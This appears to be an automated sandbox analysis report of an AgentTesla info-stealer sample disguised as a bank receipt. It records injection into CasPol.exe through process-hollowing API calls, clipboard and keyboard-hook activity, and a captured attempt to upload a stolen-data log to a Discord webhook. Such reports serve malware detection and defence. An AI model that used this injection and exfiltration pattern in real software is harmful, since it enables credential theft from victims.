Data Ascii: ------------0d40611c92ae4655a6dec63fbd8447e1Content-Disposition: form-data; name="filename"user-928100 2023-02-08 01-31-00.html------------0d40611c92ae4655a6dec63fbd8447e1Content-Disposition: form-data; name="fileformat"html------------0
2023-02-07 17:31:34 UTC | 1 | IN | HTTP/1.1 404 Not Found
Date: Tue, 07 Feb 2023 17:31:34 GMT
Content-Type: application/json
Content-Length: 45
Connection: close
set-cookie: __dcfduid=444c6840a70d11ed8760e6ba40672d66; Expires=Sun, 06-Feb-2028 17:31:34 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
strict-transport-security: max-age=31536000; includeSubDomains; preload
Via: 1.1 google
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Egxqsltc4qolLS4uzBaoE9%2FLaswRMsv8abKbQSPxREWUfQSPaTwB7kb7z0WOBsXz71TuPG8StdDXxsdUAHgNvhn4re6poX%2Bxo7O3WpOD0mQMHdrmzCmF8EGKAI5p"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __sdcfduid=444c6840a70d11ed8760e6ba40672d66dd69c8ba71cb11fcdcb8dbf0ca98829aacc0c779c3c769b75f558a3581eb9a0f; Expires=Sun, 06-Feb-2028 17:31:34 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
Set-Cookie: __cfruid=e3626c59acba08201b37fef2fc963ccf5c710641-1675791094; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 795ddc215dd0368a-FRA
{"message": "Unknown Webhook", "code": 10015}


Target ID: 0
Start time: 18:31:24
Start date: 07/02/2023
Path: C:\Users\user\Desktop\e-dekont-20230207.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\e-dekont-20230207.exe
Imagebase: 0xfc0000
File size: 688128 bytes
MD5 hash: 2FBAA4D917CCE04617F24F87309286D6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

Target ID: 1
Start time: 18:31:26
Start date: 07/02/2023
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
Imagebase: 0x5e0000
File size: 107624 bytes
MD5 hash: F866FC1C2E928779C7119353C3091F0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.575420221.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate


                                                              Execution Graph

Execution Coverage: 10.1%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 18
Total number of Limit Nodes: 0

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.307821721.00007FF9A75A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A75A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff9a75a0000_e-dekont-20230207.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 35dfe7268f080f631b4b0353ab09e527e3b20b8db83fec5324ae8acbeda03818
                                                              • Instruction ID: f87894eb999e9fd21fc41951c2da75a8239b103cfe441a5626ade1ba0d529c53
                                                              • Opcode Fuzzy Hash: 35dfe7268f080f631b4b0353ab09e527e3b20b8db83fec5324ae8acbeda03818
                                                              • Instruction Fuzzy Hash: 25C11570908A1D8FDB98DF18C899BE9B7F1FB69311F0011AAD00EE3251DB75AA84CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

(Rendered control-flow graph omitted. Basic blocks span 7ff9a75a9f7d-7ff9a75aa166; the block at 7ff9a75aa069-7ff9a75aa102 calls WriteProcessMemory.)
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.307821721.00007FF9A75A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A75A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff9a75a0000_e-dekont-20230207.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: eb0bcd48c6ec3466e1019a0a845fec69474ca42c5d5575ec4b63a14173b45a1b
                                                              • Instruction ID: db12cba0c2605138e4a07f4bd9332bdffeeb807716ded5c1b100cf1fdf670877
                                                              • Opcode Fuzzy Hash: eb0bcd48c6ec3466e1019a0a845fec69474ca42c5d5575ec4b63a14173b45a1b
                                                              • Instruction Fuzzy Hash: 89612270908A5D8FDB98DF68C885BE9BBF1FB69310F1041AED04DE3291DB74A985CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

(Rendered control-flow graph omitted. Basic blocks span 7ff9a75a9c25-7ff9a75a9ddb; the block at 7ff9a75a9c3c-7ff9a75a9d7d calls ReadProcessMemory.)
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.307821721.00007FF9A75A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A75A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff9a75a0000_e-dekont-20230207.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 6479388db53a7b35fe4605e9b835ff39ca54b3f62ebcdb0de10070da448d6e99
                                                              • Instruction ID: d22a5a23ace6b8e0fd2e995a4003cba7752f04dabf5722b3817633ce5189f0df
                                                              • Opcode Fuzzy Hash: 6479388db53a7b35fe4605e9b835ff39ca54b3f62ebcdb0de10070da448d6e99
                                                              • Instruction Fuzzy Hash: 4A513170908A5C8FDB98DF58C885BE9BBF1FB6A310F1091AED04DE3241DA70A985CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

(Rendered control-flow graph omitted. Basic blocks span 7ff9a75a9ddd-7ff9a75a9f7b; the block at 7ff9a75a9df4-7ff9a75a9f27 calls VirtualAllocEx.)
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.307821721.00007FF9A75A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A75A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff9a75a0000_e-dekont-20230207.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 9016393323866061a8f1f73b3bea1316ef428c6b3f1e95c5706dba3b1f747510
                                                              • Instruction ID: 08348a95edc1d557282138940e629e72e3890e31f40e150c9a03bfc690f0db95
                                                              • Opcode Fuzzy Hash: 9016393323866061a8f1f73b3bea1316ef428c6b3f1e95c5706dba3b1f747510
                                                              • Instruction Fuzzy Hash: B3514630908A5D8FDB98DF58C884BE9BBB1FB6A315F1051AED04DE7241DB70A885CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

(Rendered control-flow graph omitted. Basic blocks span 7ff9a75a9aa9-7ff9a75a9c21; the block at 7ff9a75a9b66-7ff9a75a9bcf calls Wow64SetThreadContext.)
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.307821721.00007FF9A75A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A75A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff9a75a0000_e-dekont-20230207.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 0d53d37a695191cb590ccc4b73df0d4e81da8e2117cff013cec69ecf176ac5d2
                                                              • Instruction ID: eb1a2e5995ed30aa0a77c8ba608120e4ec16a160a7ccecd72e4541ddf330d3b7
                                                              • Opcode Fuzzy Hash: 0d53d37a695191cb590ccc4b73df0d4e81da8e2117cff013cec69ecf176ac5d2
                                                              • Instruction Fuzzy Hash: 24514970D08A5C8FDB94DF98C889BE9BBF1FBA9311F1082AAD048D7255D7749885CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

(Rendered control-flow graph omitted. Basic blocks span 7ff9a75aa289-7ff9a75aa3a0; the block at 7ff9a75aa289-7ff9a75aa35a calls ResumeThread.)
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.307821721.00007FF9A75A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A75A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff9a75a0000_e-dekont-20230207.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: a95a0f0e31bf9a4dfb27992db916759fc1dfae009e0317d40c483739fb93dfea
                                                              • Instruction ID: 4fbc2bfad27057c88379aaebef9aa124aec76ef71cec6308e7e06300d1fdbb96
                                                              • Opcode Fuzzy Hash: a95a0f0e31bf9a4dfb27992db916759fc1dfae009e0317d40c483739fb93dfea
                                                              • Instruction Fuzzy Hash: 32415A70D08A4C8FDB98DF98D885BADBBB0FB5A310F1051AED049E7252DA71A885CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

Execution Coverage: 13.7%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 1%
Total number of Nodes: 293
Total number of Limit Nodes: 27
(Rendered execution graph omitted. API calls referenced by its nodes: CreateWindowExW, GetModuleHandleW, LoadLibraryExW, SetWindowsHookExA, GlobalMemoryStatusEx, LoadLibraryA, CallWindowProcW, OleInitialize, OleGetClipboard, GetCurrentProcess, GetCurrentThread.)
37897 6374eb8 37894->37897 37895->37894 37898 6374ef5 37896->37898 37897->37896 37903 6375f10 37898->37903 37905 637720c 37898->37905 37910 63772b0 37898->37910 37915 63774d1 37898->37915 37899 6374f1d GetCurrentThreadId 37900 6374f4e 37899->37900 37903->37899 37906 63771b9 37905->37906 37906->37905 37907 6377500 37906->37907 37920 637bac7 37906->37920 37924 637bad8 37906->37924 37907->37899 37912 63771b9 37910->37912 37911 6377500 37911->37899 37912->37911 37913 637bac7 KiUserCallbackDispatcher 37912->37913 37914 637bad8 KiUserCallbackDispatcher 37912->37914 37913->37912 37914->37912 37917 63771b9 37915->37917 37916 6377500 37916->37899 37917->37916 37918 637bac7 KiUserCallbackDispatcher 37917->37918 37919 637bad8 KiUserCallbackDispatcher 37917->37919 37918->37917 37919->37917 37923 637bace 37920->37923 37922 637baf7 37922->37906 37923->37922 37928 6374c44 37923->37928 37927 637baf2 37924->37927 37925 637baf7 37925->37906 37926 6374c44 KiUserCallbackDispatcher 37926->37927 37927->37925 37927->37926 37929 637be38 KiUserCallbackDispatcher 37928->37929 37931 637bea6 37929->37931 37931->37923 37932 687e4f8 37933 687e515 37932->37933 37934 687e53d 37932->37934 37935 687e626 GlobalMemoryStatusEx 37934->37935 37936 687e55e 37934->37936 37937 687e656 37935->37937 37938 6372308 37939 637230d 37938->37939 37940 637232b 37939->37940 37942 637232f 37939->37942 37943 6372356 37942->37943 37944 6372407 37943->37944 37947 6372d89 37943->37947 37953 6372d98 37943->37953 37944->37939 37948 6372d30 37947->37948 37949 6372d92 37947->37949 37950 637369e 37949->37950 37958 6376b60 37949->37958 37962 6376c13 37949->37962 37950->37943 37954 6372db0 37953->37954 37955 637369e 37954->37955 37956 6376c13 KiUserCallbackDispatcher 37954->37956 37957 6376b60 KiUserCallbackDispatcher 37954->37957 37955->37943 37956->37954 37957->37954 37960 6376b8d 37958->37960 37959 6376c29 37960->37959 37966 6377078 37960->37966 37963 6376be8 37962->37963 37964 6376c29 37963->37964 37965 6377078 
KiUserCallbackDispatcher 37963->37965 37965->37963 37967 6377092 37966->37967 37968 637715b 37967->37968 37969 63774d1 KiUserCallbackDispatcher 37967->37969 37970 63772b0 KiUserCallbackDispatcher 37967->37970 37971 637720c KiUserCallbackDispatcher 37967->37971 37969->37967 37970->37967 37971->37967 37972 6375f88 DuplicateHandle 37973 637601e 37972->37973
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: a${.m^
                                                              • API String ID: 0-3244929877
                                                              • Opcode ID: 14b9819b8cb49def74723031fe3dd307818d028fe17301a5281a39a73d886bdd
                                                              • Instruction ID: ed4109a4fef83070a640c874ea8392f1e0062f9aef1abddb792241baffea5a8a
                                                              • Opcode Fuzzy Hash: 14b9819b8cb49def74723031fe3dd307818d028fe17301a5281a39a73d886bdd
                                                              • Instruction Fuzzy Hash: 9DD16D74A00259DFDB05EFB4D8559AEBBB2FF88304F108429E406AB354DF39A946CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.577030143.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_4da0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xh$xh
                                                              • API String ID: 0-1680090540
                                                              • Opcode ID: f547fa8e968fe9c25fabb22e9f1b00a1a1c29dfb0354818a112d59b04e90f52a
                                                              • Instruction ID: 428bea60984efe10464ce24828d4d91b3ad320d5d63ecc541b66e5157a12e99e
                                                              • Opcode Fuzzy Hash: f547fa8e968fe9c25fabb22e9f1b00a1a1c29dfb0354818a112d59b04e90f52a
                                                              • Instruction Fuzzy Hash: FBD14A71E10209DFCB14DFA8D484AAEBBF2FF88724F14855AE415AB351DB34E946CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.577030143.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_4da0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xh$xh
                                                              • API String ID: 0-1680090540
                                                              • Opcode ID: 82c3ce7e3c8e858eb2746e520c0b3cff0bb4adc8af56c56fc91747dc584ff848
                                                              • Instruction ID: 87eb9bbfb23e84c4c913f107c81c5c57cdd0a667d064f97b3402c48496e2d0db
                                                              • Opcode Fuzzy Hash: 82c3ce7e3c8e858eb2746e520c0b3cff0bb4adc8af56c56fc91747dc584ff848
                                                              • Instruction Fuzzy Hash: D7B15E70E00209DFDF10CFA9D8857ADBBF2BF88704F148229E815A7354DB75A855CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.577030143.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_4da0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xh$xh
                                                              • API String ID: 0-1680090540
                                                              • Opcode ID: 9e6fdd3115cb1b27fb7f2614bc41bf1eaa27c25cb938e71ca8b4216515cea3f3
                                                              • Instruction ID: e7d9d2065fa0ce1c8dd17ff8997cfb21de07a2209135dc85c598551cb6722e13
                                                              • Opcode Fuzzy Hash: 9e6fdd3115cb1b27fb7f2614bc41bf1eaa27c25cb938e71ca8b4216515cea3f3
                                                              • Instruction Fuzzy Hash: 51B15171E00209CFDB10CFA9C98579DBBF2BF48714F248629E415EB354DB74A895CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.577030143.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_4da0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xh$xh
                                                              • API String ID: 0-1680090540
                                                              • Opcode ID: 947fbb8375b2b084d5a6b3b7883f2cf7ec3aaf3f882c3ba1060764aa14d5214e
                                                              • Instruction ID: 6caff313d068bac604b725efb3a01bd2fd4908bea555a075976a138ab2e7b64c
                                                              • Opcode Fuzzy Hash: 947fbb8375b2b084d5a6b3b7883f2cf7ec3aaf3f882c3ba1060764aa14d5214e
                                                              • Instruction Fuzzy Hash: FB919EB0E00209CFDF10CFA8C9957DEBBF2BF88714F148969E405A7294DB74A991CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e5a8eb287bf8a38610ea6d35b18a233e7ba181827bcbf94f28d2eea3b1d39bc1
                                                              • Instruction ID: 34b66b8b6b55c438c803bfd442be6fb62747cdec5e45153b6f9d95faeb655315
                                                              • Opcode Fuzzy Hash: e5a8eb287bf8a38610ea6d35b18a233e7ba181827bcbf94f28d2eea3b1d39bc1
                                                              • Instruction Fuzzy Hash: 9353F731D10B5A8ACB51EF68C894599F7B1FF99300F15C79AE4587B221EB70AAC4CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4069340f62cde7a4a5a21a2bf6318f3fc0463ccd6000cf47ddc18a06d18094e
                                                              • Instruction ID: 497f19f7715743e93c7927724834449b2ede15b0ebda8729812a80714159fadc
                                                              • Opcode Fuzzy Hash: b4069340f62cde7a4a5a21a2bf6318f3fc0463ccd6000cf47ddc18a06d18094e
                                                              • Instruction Fuzzy Hash: 81230B31D10A198ECB11EF68C8945EDF7B1FF99300F14D69AE459B7221EB70AAC5CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578397608.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_64d0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e0fed909d495ee27c2a9c33ac8f2936046dbe16b9f2b289e40110195362a2f14
                                                              • Instruction ID: f8f24186576bdc6b51e87e1796dfaec2298e0d4ed4f71b175fd88bb536aa8ce8
                                                              • Opcode Fuzzy Hash: e0fed909d495ee27c2a9c33ac8f2936046dbe16b9f2b289e40110195362a2f14
                                                              • Instruction Fuzzy Hash: 6B424E30E106198FDB55EFB5C86069EB3F2BFC9300F5086AAD549AB250EF71AD81CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578665147.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6870000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 400eb248dba9ea8e411381c0b090b1ad396b33d04f13710357e3952e42c36813
                                                              • Instruction ID: e176c31ca69a0ff57a387ca09d57d900a50d1db7ad9933cdcb1d5d48911d9982
                                                              • Opcode Fuzzy Hash: 400eb248dba9ea8e411381c0b090b1ad396b33d04f13710357e3952e42c36813
                                                              • Instruction Fuzzy Hash: FD22A030B101058FDB94DF78D495AAEB7F2EF89314F24846AE506EB361DB35EC418BA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578665147.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6870000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: de194fcce5f02013ac26da44ef4246d2e7241b8fd4d735a0d9e7ff5c11fd97d0
                                                              • Instruction ID: 6325680638372b6780d49f0d0dc05c9c66e2bdb58305c71937466f2b21ed7564
                                                              • Opcode Fuzzy Hash: de194fcce5f02013ac26da44ef4246d2e7241b8fd4d735a0d9e7ff5c11fd97d0
                                                              • Instruction Fuzzy Hash: EBA1B131B052688FDB58AB79985937E7BA7FFC4704F08846EE406E7294DE35DC028791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578397608.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_64d0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f208fa23b6bad91a83401120f6a67914500f85eb7f5fc49fbdaf8f6d60da288b
                                                              • Instruction ID: 07de078fc1ec9ca213073d450b28cd45485d19f1c80a9395cb2129b42937d6cb
                                                              • Opcode Fuzzy Hash: f208fa23b6bad91a83401120f6a67914500f85eb7f5fc49fbdaf8f6d60da288b
                                                              • Instruction Fuzzy Hash: 4E91F271E042158FDF728A68C4E07ABFBA6EF86324F15887BE559DB382C235D841C791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf7b09c157a83362a475fe4c9ac11eab61abcd9bf61301d5370b31712c8c22c0
                                                              • Instruction ID: 22823ab413735a164d6f812f05231e29d634bce1dc77b5f8a127a78e737b27d3
                                                              • Opcode Fuzzy Hash: cf7b09c157a83362a475fe4c9ac11eab61abcd9bf61301d5370b31712c8c22c0
                                                              • Instruction Fuzzy Hash: E4917E35E00359DFDB04DBA4D89499DBBBAFF89300F148215F416AB260EB74B945DF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9e56a9b92913bd1c661d19ec36ea529ac3933ccfcda80dc303bc350ffd9b44a3
                                                              • Instruction ID: 2e67103c235635e20715b55b7942629dd1bd075a8e0dd7a1518be25fc85a5e71
                                                              • Opcode Fuzzy Hash: 9e56a9b92913bd1c661d19ec36ea529ac3933ccfcda80dc303bc350ffd9b44a3
                                                              • Instruction Fuzzy Hash: BF918C75E00349DFCB04DBE0D8949DDBBBAFF8A300B248215F415AB264EB74B985DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 06374E68
                                                              • GetCurrentThread.KERNEL32 ref: 06374EA5
                                                              • GetCurrentProcess.KERNEL32 ref: 06374EE2
                                                              • GetCurrentThreadId.KERNEL32 ref: 06374F3B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID: xh
                                                              • API String ID: 2063062207-34918151
                                                              • Opcode ID: e696c92db44376a04f22d102f79e3877a2b866f48c8c5872dee3903e44bd3fbf
                                                              • Instruction ID: a80f9b256cd9f93f60d2f2c903c4ec2305d83075f854cf47f7c0003acc5d3e72
                                                              • Opcode Fuzzy Hash: e696c92db44376a04f22d102f79e3877a2b866f48c8c5872dee3903e44bd3fbf
                                                              • Instruction Fuzzy Hash: 625133B4D002498FDB50CFAAC588BDEBFF0BF88314F208469E019A7650CB75A984CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 06374E68
                                                              • GetCurrentThread.KERNEL32 ref: 06374EA5
                                                              • GetCurrentProcess.KERNEL32 ref: 06374EE2
                                                              • GetCurrentThreadId.KERNEL32 ref: 06374F3B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID: xh
                                                              • API String ID: 2063062207-34918151
                                                              • Opcode ID: 38b3a62e4cdb115e7b498c5a48d873d717e8cad210a15b83efdef575a4e23b39
                                                              • Instruction ID: 4bd3cd80289cf1e179c43eaf7d657e2197d27827fd809849bcf636b19664f1e3
                                                              • Opcode Fuzzy Hash: 38b3a62e4cdb115e7b498c5a48d873d717e8cad210a15b83efdef575a4e23b39
                                                              • Instruction Fuzzy Hash: 615133B4D002498FDB50CFAAC588BDEBFF4BF88314F208469E019A7650C775A884CF65
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: rendered graph not reproduced (basic blocks 6372145-63722c1; calls 6370adc and CreateWindowExW)
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06372262
Strings
Memory Dump Source
• Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
Similarity
• API ID: CreateWindow
• String ID: xh$xh
• API String ID: 716092398-1680090540
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: rendered graph not reproduced (basic blocks 6372150-63722c1; calls CreateWindowExW)
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06372262
Strings
Memory Dump Source
• Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
Similarity
• API ID: CreateWindow
• String ID: xh$xh
• API String ID: 716092398-1680090540
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: rendered graph not reproduced (basic blocks 4da487c-4da7652; calls LoadLibraryA)
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.577030143.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_4da0000_CasPol.jbxd
Similarity
• API ID: LibraryLoad
• String ID: xh$xh
• API String ID: 1029625771-1680090540
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: rendered graph not reproduced (basic blocks 4da7504-4da7652; calls LoadLibraryA)
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.577030143.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_4da0000_CasPol.jbxd
Similarity
• API ID: LibraryLoad
• String ID: xh$xh
• API String ID: 1029625771-1680090540
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: rendered graph not reproduced (basic blocks 687e4f8-687e685; calls 687bfbc, 687d164 and GlobalMemoryStatusEx)
Strings
Memory Dump Source
• Source File: 00000001.00000002.578665147.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6870000_CasPol.jbxd
Similarity
• API ID:
• String ID: xh
• API String ID: 0-34918151
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: rendered graph not reproduced (basic blocks 6374bec-637b544; calls 637274c and CallWindowProcW)
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 0637B4E9
Strings
Memory Dump Source
